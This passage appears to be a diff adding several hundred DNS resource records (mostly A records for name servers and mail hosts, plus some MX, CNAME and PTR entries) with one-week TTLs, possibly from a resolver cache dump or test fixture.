+NS.USSR.EU.net. 604800 IN A 193.124.22.65 +NS.INTERNET.SK. 604800 IN A 192.108.130.91 +CORREOS.SEKER.ES. 604800 IN A 194.179.87.1 +mx1.buf.ADELPHIA.net. 604800 IN A 24.48.36.10 +aun.UNINETT.NO. 604800 IN A 129.241.1.99 +NS0.NETANET.com. 604800 IN A 195.172.127.72 +NS0.NETANET.com. 604800 IN A 194.6.96.218 +www.MANY-PATHS-ENERGY-ENHANCEMENT.com. 604800 IN A 66.33.4.50 +NS2.STARFIRE.DOUGLAS.MA.us. 604800 IN A 216.129.136.9 +NS3.IKP.PL. 604800 IN A 157.25.5.30 +pns.dtag.de. 604800 IN A 194.25.0.125 +NZ.NS.NIC.NU. 604800 IN A 203.97.132.66 +DAVER.bungi.com. 604800 IN A 207.126.97.2 +DAVER.bungi.com. 604800 IN A 206.14.228.2 +gutenberg.bucksnet.com. 604800 IN A 207.113.15.5 +DNS2.IT.net. 604800 IN A 151.1.2.1 +NS2.SNS-UT.DEBIS.com. 604800 IN A 53.122.2.10 +ISI.EDU. 604800 IN A 128.9.176.32 +amethyst.xaos.org. 
604800 IN A 204.145.159.12 +PAPPILLOMA.WWEBSVS.com. 604800 IN A 209.233.37.10 +NS2.bock.com. 604800 IN A 64.30.29.4 +NS2.OAR.net. 604800 IN A 192.88.195.10 +MINION.NETPOLICY.com. 604800 IN A 207.87.121.66 +Mail.catic1.com. 604800 IN A 207.190.204.103 +NS4.DNS.space.net. 604800 IN A 195.222.210.93 +b.gtld-servers.ORSC. 604800 IN A 216.13.126.116 +bend.madriver.com. 604800 IN A 207.136.232.15 +NS4.IS-FUN.net. 604800 IN A 212.162.54.34 +NS2.JPS.net. 604800 IN A 216.224.156.252 +NS1.IP-PLUS.net. 604800 IN A 164.128.36.34 +rush.cc1.RPSLMC.EDU. 604800 IN A 144.74.150.23 +NS2.GBMTECH.net. 604800 IN A 208.243.164.3 +DNS.MSEN.com. 604800 IN A 148.59.19.11 +DNSSEC2.SINGNET.COM.SG. 604800 IN A 195.13.10.226 +NS2.HOME.net. 604800 IN A 24.2.0.27 +ACCESS.MBNET.MB.CA. 604800 IN A 130.179.16.143 +DNS0.SPIN.AD.JP. 604800 IN A 165.76.0.98 +Filer.PHOTOTRUST.com. 604800 IN A 64.85.86.172 +jpl.NASA.GOV. 604800 IN A 137.78.160.180 +NS2.TECHNOLOGIA.net. 604800 IN A 207.253.59.4 +bparker.CONNACTIVITY.com. 604800 IN A 206.34.200.200 +NS1.uvm.EDU. 604800 IN A 132.198.201.10 +NS.SENET.net. 604800 IN A 206.155.163.195 +DNS2.UTCC.UTORONTO.CA. 604800 IN A 128.100.102.201 +localhost.costorf.com. 604800 IN A 127.0.0.1 +DNS2.AD. 604800 IN A 194.158.64.8 +HYDRA.HELSINKI.FI. 604800 IN A 128.214.4.29 +NAME.PHX.GBLX.net. 604800 IN A 206.165.6.10 +NS2.FOOL.com. 604800 IN A 208.51.76.222 +NS01-SERVER.CURINFO.AN. 604800 IN A 200.44.117.129 +NS.CR. 604800 IN A 163.178.8.2 +mail.pshift.net. 604800 IN A 208.153.85.30 +NS.IRD.FR. 604800 IN A 195.83.14.1 +NS.UZ. 604800 IN A 213.68.88.11 +DNS.INTELCOM.SM. 604800 IN A 194.183.64.11 +DNS2.UNIV-NKC.MR. 604800 IN A 193.251.145.154 +HNS3.hns.com. 604800 IN A 208.236.67.3 +bay.cs.UTORONTO.CA. 604800 IN A 128.100.1.1 +NS0.BT.net. 604800 IN A 194.72.6.51 +BAYONET.SJMERCURY.com. 604800 IN A 207.1.134.34 +PAN.BIJT.net. 604800 IN A 213.196.2.97 +NAVI.SUBTEND.net. 604800 IN A 208.186.117.224 +NS.CIX.CX. 604800 IN A 195.222.235.216 +waldorf.Informatik.Uni-Dortmund.de. 
604800 IN A 129.217.4.42 +NS2.ivillage.com. 604800 IN A 209.185.162.16 +DNS.NIC.XLINK.net. 604800 IN A 193.141.40.42 +NS1.MERCHANTWARE.CON. 604800 IN A 209.170.142.34 +NS.TO.GD-ES.com. 604800 IN A 199.107.240.66 +NS-A.RNC.RO. 604800 IN A 192.162.16.31 +REGGAE.NCREN.net. 604800 IN A 128.109.131.3 +SSS-NL.DENIC.de. 604800 IN A 193.0.0.237 +NS1.TDC.TO. 604800 IN A 206.86.247.250 +NS.NIC.HU. 604800 IN A 193.6.27.62 +JOANNA.WILLIAM.org. 604800 IN A 195.153.6.2 +NS0.IIJ.AD.JP. 604800 IN A 202.232.2.34 +maus.spack.org. 604800 IN A 204.245.198.90 +B.NS.VERIO.net. 604800 IN A 129.250.35.32 +SECDNS.EUNET.BE. 604800 IN A 193.74.208.139 +NS3.EUROPE.YAHOO.com. 604800 IN A 217.12.4.71 +A.ROOT-SERVERS.net. 604800 IN A 198.41.0.4 +sherickpm.com. 604800 IN MX 10 inbound.sherickpm.com.criticalpath.net. +NS2.MEDIASERVICES.net. 604800 IN A 64.65.16.237 +YARDBIRD.CNS.vt.EDU. 604800 IN A 198.82.247.34 +SUNIC.SUNET.SE. 604800 IN A 192.36.125.2 +NS.MT. 604800 IN A 193.188.47.252 +CNDVG001.usa.net. 604800 IN A 165.212.12.1 +NS1.CX.ESCROW.IOCOMM.NET.CX. 604800 IN A 203.132.96.2 +DNS-02.NS.AOL.com. 604800 IN A 205.188.157.232 +ns2.tesserae.com. 604800 IN A 209.157.194.3 +SV10.BATELCO.COM.BH. 604800 IN A 193.188.124.227 +dec.anr.state.vt.us. 604800 IN MX 0 dec.anr.state.vt.us. +dec.anr.state.vt.us. 604800 IN MX 10 mx1.state.vt.us. +dec.anr.state.vt.us. 604800 IN MX 10 mx2.state.vt.us. +3.133.188.192.IN-ADDR.ARPA. 604800 IN PTR elektro.com. +NS1.LONDON.UK.NETDNS.com. 604800 IN A 212.62.6.38 +NS.NIC.MG. 604800 IN A 194.214.107.253 +DNS1.VN. 604800 IN A 203.162.3.235 +DENS20.DEN.nps.GOV. 604800 IN A 165.83.24.20 +z.ip6.INT. 604800 IN A 198.32.2.66 +NS3.TRIVALLEY.com. 604800 IN A 206.25.132.30 +isis.imag.FR. 604800 IN A 129.88.32.24 +NS.SOVAM.com. 604800 IN A 194.67.2.97 +NS-SOA.DARENET.DK. 604800 IN A 130.226.1.4 +NS4.NIC.TV. 604800 IN A 207.151.24.23 +DNSSRV1X.mitre.org. 604800 IN A 199.94.97.51 +GATEKEEPER.NYTIMES.com. 604800 IN A 199.181.175.201 +D.I-DNS.net. 
604800 IN A 211.169.245.170 +NS.KOLO.net. 604800 IN A 209.66.103.20 +NS4.FIRSTWORLD.net. 604800 IN A 216.7.160.162 +DECST.CERIST.DZ. 604800 IN A 193.194.64.11 +NS4.DNS.WS. 604800 IN A 216.52.234.102 +NS0.GDGSC.com. 604800 IN A 192.160.62.66 +UCTHPX.UCT.AC.ZA. 604800 IN A 137.158.128.1 +NS2.HOTWIRED.com. 604800 IN A 209.185.151.6 +ns02.ca.us.ibm.net. 604800 IN A 165.87.201.243 +NS2.SPEAKEASY.net. 604800 IN A 216.231.41.22 +TELCOM.ZPTC.CO.ZW. 604800 IN A 194.133.122.47 +NS.DK-HOSTMASTER.DK. 604800 IN A 193.163.102.2 +NS.NIC.LK. 604800 IN A 192.248.1.65 +NS2.zama.net. 604800 IN A 203.142.130.5 +CZ.EUNET.CZ. 604800 IN A 193.85.3.130 +NS.AC.ID. 604800 IN A 202.159.124.34 +NS1.CUBE.de. 604800 IN A 212.162.54.243 +NS1.QUASAR.net. 604800 IN A 199.166.31.3 +NS1.OFFSHORE.AI. 604800 IN A 209.88.68.34 +NS5.NRSITE.com. 604800 IN A 208.178.169.4 +NS.AIC.net. 604800 IN A 195.250.64.65 +OWL.NCC.nps.GOV. 604800 IN A 165.83.34.60 +MAXIM.gbch.net. 604800 IN A 203.9.155.249 +BOW.INTNET.TD. 604800 IN A 193.251.147.253 +ns1.cacheware.com. 604800 IN A 64.221.210.242 +NS2.SPEEDHOST.com. 604800 IN A 216.42.31.169 +NS1.COMMIT.GM. 604800 IN A 63.77.152.177 +NAME.ROC.GBLX.net. 604800 IN A 209.130.187.10 +90.198.245.204.IN-ADDR.ARPA. 604800 IN PTR maus.spack.org. +BOLOGNA.NETTUNO.IT. 604800 IN A 193.43.2.5 +NIC.IBD.com. 604800 IN A 209.249.61.18 +NS.WESTOL.com. 604800 IN A 63.93.137.4 +time.SOVER.net. 604800 IN CNAME garnet.SOVER.net. +UNIX1.CS.UMASS.EDU. 604800 IN A 128.119.40.12 +AARDVARK.WR.UMIST.AC.UK. 604800 IN A 130.88.146.3 +AARDVARK.WR.UMIST.AC.UK. 604800 IN A 128.16.5.31 +NS1.NIC.YU. 604800 IN A 147.91.8.6 +mail.velco.com. 604800 IN A 198.136.217.106 +DNSAUTH2.SYS.GTEI.net. 604800 IN A 4.2.49.3 +NS.TELE.FI. 604800 IN A 193.210.19.19 +state.vt.us. 604800 IN MX 10 mx1.state.vt.us. +state.vt.us. 604800 IN MX 10 mx2.state.vt.us. +NS.NYC.juno.com. 604800 IN A 205.231.108.1 +NS1.g-world.com. 604800 IN A 216.26.39.10 +AUTH2.AMERICA.net. 604800 IN A 209.17.197.18 +KIRA.ECS.UMASS.EDU. 
604800 IN A 128.119.91.10 +CONACYT.GOB.SV. 604800 IN A 168.243.64.2 +DNS.SRCE.HR. 604800 IN A 161.53.3.7 +NS00.ns0.com. 604800 IN A 216.92.60.60 +NS2.CL.BELLSOUTH.net. 604800 IN A 205.152.16.8 +jenner.med.HARVARD.EDU. 604800 IN A 134.174.141.2 +p2.cavebear.com. 604800 IN A 199.184.128.35 +NS1.NIC.JE. 604800 IN A 216.110.45.224 +ORCU.OR.BR.NP.ELS-GMS.att.net. 604800 IN A 199.191.129.139 +NS.XBILL.org. 604800 IN A 204.152.186.163 +WRAITH.CS.UOW.EDU.AU. 604800 IN A 130.130.64.1 +12.159.145.204.IN-ADDR.ARPA. 604800 IN PTR amethyst.xaos.org. +ns1.pr.SUN.com. 604800 IN A 192.18.16.2 +NS.SPIN.OMNES.net. 604800 IN A 192.23.90.196 +smtp.188.net. 604800 IN A 202.96.125.104 +TERMINAL.2GLOBE.net. 604800 IN A 195.178.183.230 +NS2.HARVARD.EDU. 604800 IN A 128.103.1.1 +NAMESERVER.CNR.IT. 604800 IN A 194.119.192.34 +EARTH.SY. 604800 IN A 195.22.198.6 +DNS2.REACCIUN.VE. 604800 IN A 150.188.4.212 +NS.TMX.COM.NI. 604800 IN A 205.218.253.2 +freefour.acs.rpi.EDU. 604800 IN A 128.113.24.91 +242.84.198.209.IN-ADDR.ARPA. 604800 IN PTR dlawren-gw.burl.sover.net. +CORREU.STA.AD. 604800 IN A 194.158.67.1 +NS.DRUKNET.NET.BT. 604800 IN A 202.144.128.200 +NS4.US.PRSERV.net. 604800 IN A 165.87.201.244 +KAASASSUK.GH.GL. 604800 IN A 194.177.232.3 +ECUA.NET.EC. 604800 IN A 157.100.1.2 +NS.CONCYT.GOB.GT. 604800 IN A 168.234.106.2 +NS2.NAP.net. 604800 IN A 206.54.224.1 +DNS2.CN.net. 604800 IN A 202.97.18.61 +MX.NSI.NASA.GOV. 604800 IN A 128.102.18.31 +NS.TDS.net. 604800 IN A 204.246.1.20 +tdns-me1.NETSCAPE.com. 604800 IN A 205.188.247.67 +NS2.METU.EDU.TR. 604800 IN A 144.122.199.93 +NS2.SETARNET.AW. 604800 IN A 206.48.100.11 +87.184.152.204.IN-ADDR.ARPA. 604800 IN PTR isrv3-i.isc.org. +DNS.OMNIWAY.SM. 604800 IN A 194.183.64.10 +NS0.U-NET.net. 604800 IN A 194.119.128.65 +elektro.CMHNET.org. 604800 IN A 192.188.133.3 +ns2.HIGGS.net. 604800 IN A 204.80.125.145 +NS2.SKYNETWEB.com. 604800 IN A 208.231.1.35 +MAGIC.MN. 604800 IN A 202.131.0.10 +NS1.YAHOO.com. 604800 IN A 204.71.200.33 +mx1.cdp.ADELPHIA.net. 
604800 IN A 24.48.58.221 +SANTO.VANUATU.COM.VU. 604800 IN A 202.139.40.7 +www.mmuuf.org. 604800 IN MX 10 gro.dd.org. +ns1.timeheart.net. 604800 IN A 63.197.231.203 +NS2.TOGETHER.net. 604800 IN A 204.97.120.31 +NS.AMNIC.net. 604800 IN A 195.250.64.90 +NS.EENET.EE. 604800 IN A 193.40.56.245 +www.ONLINEPHOTOCONTEST.com. 604800 IN A 64.85.86.152 +VIC20.BLIPP.com. 604800 IN A 195.163.165.35 +DNS.FROGHOUSE.org. 604800 IN A 207.121.69.243 +NS2.ELI.net. 604800 IN A 207.173.86.2 +NS.CAIS.com. 604800 IN A 205.177.10.10 +BAABEN.AFRIQ.net. 604800 IN A 165.231.1.3 +NS2.NJ.EXODUS.net. 604800 IN A 209.1.10.234 +DOMREG.NIC.CH. 604800 IN A 130.59.1.80 +NS.EU.net. 604800 IN A 192.16.202.11 +NS1.DIEBOLD.net. 604800 IN A 65.196.80.10 +NS3.CP.net. 604800 IN A 209.228.14.4 +DNS.FUW.EDU.PL. 604800 IN A 193.0.80.11 +www.retro.com. 604800 IN A 205.179.181.195 +NS2.UNI2.net. 604800 IN A 195.82.195.99 +ns1.alcatrazmedia.com. 604800 IN A 167.160.132.2 +dns6.CP.MSFT.net. 604800 IN A 207.46.138.20 +NS1.SEYCHELLES.net. 604800 IN A 202.84.235.33 +NS2.INTERNIC.net. 604800 IN A 198.41.0.11 +front.macrosoft.WAW.PL. 604800 IN A 194.196.86.66 +NISC.JVNC.net. 604800 IN A 128.121.50.7 +AUTH03.NS.DE.UU.net. 604800 IN A 192.76.144.16 +BURDELL.CC.GATECH.EDU. 604800 IN A 130.207.3.207 +NS4.AH.net. 604800 IN A 203.21.205.20 +ns1.sgh-net.de. 604800 IN A 212.86.129.142 +Leland2.stanford.EDU. 604800 IN A 171.64.14.58 +CBRU.BR.NS.ELS-GMS.att.net. 604800 IN A 199.191.128.105 +DENEB.DOMAINNT.net. 604800 IN A 207.211.220.90 +ns1.ivm.net. 604800 IN A 62.204.1.1 +NS0.CWCI.net. 604800 IN A 194.6.79.162 +35.110.16.12.IN-ADDR.ARPA. 604800 IN CNAME 35.32/27.110.16.12.IN-ADDR.ARPA. +f.trns. 604800 IN A 209.133.38.16 +ODISEJ.TELEKOM.YU. 604800 IN A 195.178.32.2 +FRCU.EUN.EG. 604800 IN A 193.227.1.1 +NS.HHS.net. 604800 IN A 63.93.136.29 +FOO.GRNET.GR. 604800 IN A 194.177.210.211 +mail.WonderWorks.com. 604800 IN A 192.203.206.67 +NS1.IAFRICA.com. 604800 IN A 196.7.0.139 +NS.KACST.EDU.SA. 
604800 IN A 212.26.44.3 +srs.state.vt.us. 604800 IN A 159.105.101.150 +OM4.OMANTEL.NET.OM. 604800 IN A 206.49.101.5 +Yeshua.Christ.com. 604800 IN A 207.54.4.5 +NS1.SIMORGH.com. 604800 IN A 209.1.163.10 +OLKETA.SOLOMON.COM.SB. 604800 IN A 202.139.42.4 +BANBA.DOMAINREGISTRY.IE. 604800 IN A 193.1.142.2 +NOC.IOS.com. 604800 IN A 198.4.75.69 +ns.schnism.net. 604800 IN A 195.88.150.3 +e4.ny.us.IBM.com. 604800 IN A 32.97.182.104 +DNS2.SEANET.com. 604800 IN A 199.181.164.2 +doubt.dd.org. 604800 IN A 209.198.103.193 +AMBER.ELEKTRON.PL. 604800 IN A 195.117.6.10 +gw.rge.com. 604800 IN A 157.225.178.11 +NS2.ZTNET.com. 604800 IN A 63.211.17.252 +NS3.INFI.net. 604800 IN A 205.219.239.5 +ZA.AKADNS.net. 604800 IN A 209.185.188.39 +ESTIA.CSI.FORTH.GR. 604800 IN A 139.91.191.3 +vtagr04.agr.state.vt.us. 604800 IN A 159.105.50.4 +NS1-PUBLIC.ZTX.COMPAQ.com. 604800 IN A 161.114.1.204 +ADMII.ARL.MIL. 604800 IN A 128.63.31.4 +ADMII.ARL.MIL. 604800 IN A 128.63.5.4 +NS.NIXU.FI. 604800 IN A 193.209.237.29 +DNS2.PIONEERNET.net. 604800 IN A 208.240.196.10 +NS.NIC.CL. 604800 IN A 146.83.4.11 +NS2.UTZ. 604800 IN A 160.124.112.10 +NS4.LUXNOC.com. 604800 IN A 195.206.104.201 +NS2.PBI.net. 604800 IN A 206.13.29.11 +annwfn.erfurt.thur.de. 604800 IN A 194.122.210.3 +NS1.MW.mediaone.net. 604800 IN A 24.131.1.8 +NS1.ISU.NET.SA. 604800 IN A 212.26.18.3 +pop.SHOREHAM.net. 604800 IN CNAME SHOREHAM.net. +DNS2.GUERNSEY.net. 604800 IN A 195.226.128.3 +NS1.BEACHSHORE.net. 604800 IN A 199.166.31.250 +HKUXB.HKU.HK. 604800 IN A 147.8.16.15 +NS.DOLEH.com. 604800 IN A 204.255.25.63 +NS.hactrn.net. 604800 IN A 216.254.68.12 +MALAKULA.BONDY.IRD.FR. 604800 IN A 193.50.53.1 +NS1.mediaone.net. 604800 IN A 24.128.1.80 +NS2.GPG.com. 604800 IN A 209.1.163.50 +noc.BelWue.de. 604800 IN A 129.143.2.1 +NS2.GIP.net. 604800 IN A 204.59.1.222 +RS.ISLES.net. 604800 IN A 212.100.224.90 +BOW.INTNET.GQ. 604800 IN A 195.101.152.253 +A.OPEN.BY. 604800 IN A 194.226.121.36 +us.i1.YIMG.com. 604800 IN CNAME a1.g.a.YIMG.com. 
+athome.wetlogic.net. 604800 IN CNAME c1059495-a.snvl1.sfba.home.com. +NS1.NIST.GOV. 604800 IN A 129.6.13.2 +mail.jerusalem-mail.com. 604800 IN A 216.251.232.93 +ISDSUN.cr.USGS.GOV. 604800 IN A 136.177.16.3 +NS.BOSTON.juno.com. 604800 IN A 64.136.25.53 +NS2.CADABRA.com. 604800 IN A 209.157.194.109 +nps.GOV. 604800 IN MX 10 ccmail2.itd.nps.GOV. +nps.GOV. 604800 IN MX 5 ccmail.itd.nps.GOV. +RELAY.HUJI.AC.IL. 604800 IN A 128.139.6.1 +styx.tahina.priv.at. 604800 IN A 194.152.163.253 +ISGATE.IS. 604800 IN A 193.4.58.51 +ns0.lux.dot-eu.org. 604800 IN A 195.206.105.102 +BILBO.NASK.ORG.PL. 604800 IN A 195.187.245.51 +BILBO.NASK.ORG.PL. 604800 IN A 148.81.16.51 +MAIL.TARSUS.com. 604800 IN A 208.130.9.252 +SUN.REDIRIS.ES. 604800 IN A 130.206.1.2 +NS2.NEASE.net. 604800 IN A 202.103.134.4 +OHCU.OH.MT.NP.ELS-GMS.att.net. 604800 IN A 199.191.144.75 +NS2.NF. 604800 IN A 203.12.249.101 +MIRAF-SERVER3.HONDUTEL.HN. 604800 IN A 206.48.104.142 +ns3.worldnet.att.net. 604800 IN A 204.127.160.1 +NS2.NETNAMES.net. 604800 IN A 212.53.77.28 +ITGBOX.IAT.CNR.IT. 604800 IN A 146.48.65.46 +NS2.ADELPHIA.net. 604800 IN A 24.48.62.35 +NS2.RIPN.net. 604800 IN A 195.209.0.6 +NS1.cinenet.net. 604800 IN A 198.147.76.65 +jengate.thur.de. 604800 IN A 193.174.15.34 +NOC.ULCC.JA.net. 604800 IN A 193.63.94.25 +NS.NOC.UZ. 604800 IN A 194.67.52.42 +NS0.JA.net. 604800 IN A 128.86.1.20 +NS0.JA.net. 604800 IN A 193.63.94.20 +NS2.INR.net. 604800 IN A 198.77.208.3 +netsage.org. 604800 IN A 209.67.235.38 +TERI.USP.AC.FJ. 604800 IN A 144.120.8.1 +NS2.NETSOL.com. 604800 IN A 198.17.208.71 +NS2.ABAC.com. 604800 IN A 216.55.144.4 +NS2.NIC.FR. 604800 IN A 192.93.0.4 +KANIN.ARNES.SI. 604800 IN A 193.2.1.66 +NS.EDU.GU. 604800 IN A 168.123.2.50 +DNS.INRIA.FR. 604800 IN A 193.51.208.13 +HEDNS1.GOOGLE.com. 604800 IN A 64.209.200.10 +asylum.sf.ca.us. 604800 IN A 192.48.232.17 +ACT2.ACT2000.net. 604800 IN A 207.42.132.227 +ICM1.ICP.net. 604800 IN A 192.94.207.66 +202.192.103.198.209.IN-ADDR.ARPA. 604800 IN PTR fraud.dd.org. 
+ECSEL.jhuapl.EDU. 604800 IN A 128.244.65.29 +NS2.DCNY.DOUBLECLICK.net. 604800 IN A 204.253.104.10 +keith.netsage.org. 604800 IN A 209.67.235.37 +MANTA.OUTREMER.com. 604800 IN A 213.16.1.106 +NS2.globalnetisp.net. 604800 IN A 207.136.213.2 +NS2.CCSRS.net. 604800 IN A 206.253.214.73 +NS1.NL.CONCENTRIC.com. 604800 IN A 195.18.114.5 +NS2.VI.net. 604800 IN A 212.78.64.10 +NS2.NEO.net. 604800 IN A 206.109.7.65 +cgi.MERCURYCENTER.com. 604800 IN CNAME vh80167.vh8.infi.net. +ORSTOM.RIO.net. 604800 IN A 192.33.151.1 +NS2.CONRADPROMOTIONS.com. 604800 IN A 208.24.118.203 +YARRINA.CONNECT.COM.AU. 604800 IN A 192.189.54.17 +dns03.OPS.usa.net. 604800 IN A 204.68.24.136 +APPSRV.HAITIWORLD.com. 604800 IN A 206.152.15.34 +NS.RELCOM.KZ. 604800 IN A 212.110.240.65 +NS1.MAGIC-MOMENTS.com. 604800 IN A 195.224.53.80 +NS.ALCATEL.com. 604800 IN A 192.160.6.91 +ns2.terra.net. 604800 IN A 199.103.128.2 +NS3.hotmail.com. 604800 IN A 209.185.130.68 +vtc.VSC.EDU. 604800 IN MX 0 eve.vtc.VSC.EDU. +www.vmba.org. 604800 IN MX 10 gro.dd.org. +NAHOURI.ONATEL.BF. 604800 IN A 206.82.130.195 +SERVER2.INFN.IT. 604800 IN A 131.154.1.3 +NS2.AI-R.com. 604800 IN A 66.33.4.51 +NS1.FREE.net. 604800 IN A 147.45.15.34 +vcmr-54.server.rpi.EDU. 604800 IN A 128.113.113.44 +haig.CS.UCL.AC.UK. 604800 IN A 128.16.6.8 +mail.nova-data.com. 604800 IN A 12.16.110.35 +MOEVAX.EDU.TW. 604800 IN A 140.111.1.2 +NS2.LTWCC.org. 604800 IN A 12.33.66.62 +NS.BA. 604800 IN A 195.130.35.5 +noc.HRZ.uni-bielefeld.de. 604800 IN A 129.70.5.16 +VANILLA.WRO.nps.GOV. 604800 IN A 165.83.71.3 +NS2.SZTAKI.HU. 604800 IN A 193.225.86.1 +SECIU.EDU.UY. 604800 IN A 164.73.128.5 +COL2.CARIBSURF.com. 604800 IN A 205.214.192.202 +NS2.QATAR.NET.QA. 604800 IN A 212.77.192.13 +NS2.E-SYNC.net. 604800 IN A 192.206.57.128 +ns1.eu.SUN.com. 604800 IN A 192.18.240.8 +NS1.UUSJ.DOUBLECLICK.net. 604800 IN A 204.176.177.10 +NS2.CUHK.EDU.HK. 604800 IN A 137.189.6.21 +NS1.MEITCA.com. 604800 IN A 137.203.5.1 +NS2.DSL.net. 
604800 IN A 209.87.79.232 +techfac.techfak.uni-bielefeld.de. 604800 IN A 129.70.132.100 +listserv.performancediver.com. 604800 IN A 216.34.185.155 +foolusmf.D4P.net. 604800 IN CNAME a100.g.akamai.net. +pedic-med.vrx.net. 604800 IN A 199.166.24.2 +GRUMPY.NET.NA. 604800 IN A 196.20.23.1 +BK.tifosi.com. 604800 IN A 208.58.189.13 +ns3.PAIR.com. 604800 IN A 209.68.1.15 +ns2.ar.com. 604800 IN A 64.124.80.42 +MASSIRA.ONPT.NET.MA. 604800 IN A 206.103.26.1 +NS.KBFI.EE. 604800 IN A 192.121.251.13 +ns3.Algebra.com. 604800 IN A 216.254.54.22 +faerber.muc.de. 604800 IN MX 10 slarti.muc.de. +9.206.203.192.IN-ADDR.ARPA. 604800 IN PTR ice.WonderWorks.COM. +PUKU.UNZA.ZM. 604800 IN A 196.7.240.1 +ATLNET.ATLONLINE.com. 604800 IN A 207.153.72.193 +Z1.NS.NYC1.GLOBIX.net. 604800 IN A 209.10.66.55 +www.hometownbands.com. 604800 IN A 209.67.235.38 +SIMON.CS.CORNELL.EDU. 604800 IN A 128.84.154.10 +EKEKO.RCPIP.net. 604800 IN A 209.45.127.2 +emerald.itnet.com.PL. 604800 IN A 195.116.64.3 +DNS1.ICS.FORTH.GR. 604800 IN A 139.91.151.70 +NS.ATL.BELLSOUTH.net. 604800 IN A 205.152.0.20 +ntp.ctr.COLUMBIA.EDU. 604800 IN CNAME sirius.ctr.COLUMBIA.EDU. +NS2.GLOBECOMM.net. 604800 IN A 165.251.1.3 +UUNS1DNS1.FLONETWORK.com. 604800 IN A 209.167.79.5 +GRIN.GNOSH.net. 604800 IN A 216.15.87.207 +NS.DIGSYS.BG. 604800 IN A 192.92.129.1 +uunet.UU.net. 604800 IN MX 10 Mail.UU.net. +ns1.vermontel.com. 604800 IN A 204.164.106.2 +NS2.GREENMOUNTAINACCESS.net. 604800 IN A 208.144.252.31 +38.241.5.198.IN-ADDR.ARPA. 604800 IN PTR cmr0.ash.ops.us.uu.net. +NS1.NIC.UK. 604800 IN A 195.66.240.130 +DNS.FCCN.PT. 604800 IN A 193.136.192.10 +NS2.NIC.TJ. 604800 IN A 209.77.224.1 +NS4.NEWACCOUNT.com. 604800 IN A 209.78.16.6 +NS2.IHUG.NET.NZ. 604800 IN A 203.29.160.2 +NS.SIGNALZ.com. 604800 IN A 209.67.230.71 +DNS.NIC.AD. 604800 IN A 194.158.67.251 +3.2.39.137.IN-ADDR.ARPA. 604800 IN PTR New-York4.NY.ALTER.NET. +UUCP-GW-2.PA.DEC.com. 604800 IN A 16.1.0.19 +NS.LANDLORDS.com. 604800 IN A 63.64.164.68 +NS2.EXODUS.net. 
604800 IN A 207.82.198.150 +NS2.SCRUZ.net. 604800 IN A 165.227.2.10 +NS.PIPEX-SZ.net. 604800 IN A 196.15.232.19 +saturn.SUN.com. 604800 IN A 192.9.25.2 +e24.nc.us.IBM.com. 604800 IN A 32.97.136.230 +NMS.CYFRONET.KRAKOW.PL. 604800 IN A 149.156.1.3 +NS.TWNIC.net. 604800 IN A 192.83.166.11 +ns2.alcatel.NO. 604800 IN A 193.213.238.2 +INPAKSODNS.AKSO.nps.GOV. 604800 IN A 165.83.49.9 +mail.reptiles.org. 604800 IN A 198.96.117.157 +59.187.152.204.IN-ADDR.ARPA. 604800 IN PTR shell.nominum.com. +ns1.mobydark.com. 604800 IN A 216.13.76.21 +NS.KG. 604800 IN A 195.38.160.36 +NS.SPB.SU. 604800 IN A 193.124.83.69 +PENDRAGON.CS.PURDUE.EDU. 604800 IN A 128.10.2.5 +NS1.IGC.APC.org. 604800 IN A 192.82.108.38 +USDNS.NIC.us. 604800 IN A 198.41.3.87 +NS2.WEBTRENDS.com. 604800 IN A 63.88.212.11 +URANUS.DAIMI.AAU.DK. 604800 IN A 130.225.16.40 +ANTANA.IRD.MG. 604800 IN A 194.214.107.1 +NS.JERSEY.juno.com. 604800 IN A 64.136.17.178 +NS2.INTERNET-TOOLS.com. 604800 IN A 206.109.113.140 +ns-tk012.ocn.AD.JP. 604800 IN A 203.139.160.74 +bvt-ext.gdarm.com. 604800 IN A 166.19.32.42 +NS1.ID. 604800 IN A 202.155.30.227 +NS2.MAHNET.net. 604800 IN A 207.219.173.132 +NS.ALCANET.COM.AU. 604800 IN A 203.62.196.10 +UTAMA.BOLNET.BO. 604800 IN A 166.114.1.40 +NS.CNC.AC.CN. 604800 IN A 159.226.1.1 +NS.KREN.NE.KR. 604800 IN A 147.47.1.1 +NS1.REDHAT.com. 604800 IN A 216.148.218.250 +db.rc.VIX.com. 604800 IN A 204.152.187.21 +198.103.198.209.IN-ADDR.ARPA. 604800 IN CNAME 198.192.103.198.209.IN-ADDR.ARPA. +alf.pbks.PL. 604800 IN A 195.205.33.200 +FLAG.EP.net. 604800 IN A 198.32.4.13 +DNS2.IUNET.IT. 604800 IN A 192.106.1.31 +NS2.QUANTIFIED.net. 604800 IN A 63.212.171.3 +INTERNET-SERVER.ZURICH.IBM.com. 604800 IN A 195.212.119.252 +seaipsvcs.idx.com. 604800 IN A 172.22.64.42 +lebanon.valley.net. 604800 IN A 198.115.160.16 +SERVER.NORDU.net. 604800 IN A 193.10.252.19 +NS.NIC.DO. 604800 IN A 207.176.16.50 +isc-01.iscvt.org. 604800 IN A 207.136.209.131 +NAC.NO. 604800 IN A 129.240.2.40 +SAVA.UTIC.NET.BA. 
604800 IN A 195.130.35.3 +NS1.TOKYO.JP.NETDNS.com. 604800 IN A 64.56.164.118 +NETSERV2.ITS.rpi.EDU. 604800 IN A 128.113.1.3 +IFI.UIO.NO. 604800 IN A 129.240.64.2 +www.TOAPLAN.com. 604800 IN A 216.42.31.169 +ns2.the-frontier.org. 604800 IN A 216.86.199.115 +NS.UNAM.MX. 604800 IN A 132.248.253.1 +ARISTO.TAU.AC.IL. 604800 IN A 132.66.32.10 +DNS.CS.WISC.EDU. 604800 IN A 128.105.2.10 +NS1.NIC.IR. 604800 IN A 194.225.70.83 +NS1.RETINA.AR. 604800 IN A 200.10.202.3 +mailer.connriver.net. 604800 IN A 63.93.137.13 +NS.ATI.TN. 604800 IN A 193.95.66.10 +NS2.CLEAR.NET.NZ. 604800 IN A 203.97.37.14 +NS4.EARTHLINK.net. 604800 IN A 209.179.179.19 +mejac.palo-alto.ca.us. 604800 IN A 192.147.236.1 +New-York4.NY.ALTER.net. 604800 IN A 137.39.2.3 +New-York4.NY.ALTER.net. 604800 IN A 137.39.126.10 +falcon.tallship.net. 604800 IN A 208.179.112.2 +ZEUS.CC.UCY.AC.CY. 604800 IN A 194.42.1.1 +NS2.SECURE.net. 604800 IN A 161.58.9.10 +NS0.FLIRBLE.org. 604800 IN A 195.40.6.20 +dns.zenon.net. 604800 IN A 195.2.83.107 +SERVIDOR.MICROASTUR.ES. 604800 IN A 195.76.178.5 +DOWNSTAGE.MCS.VUW.AC.NZ. 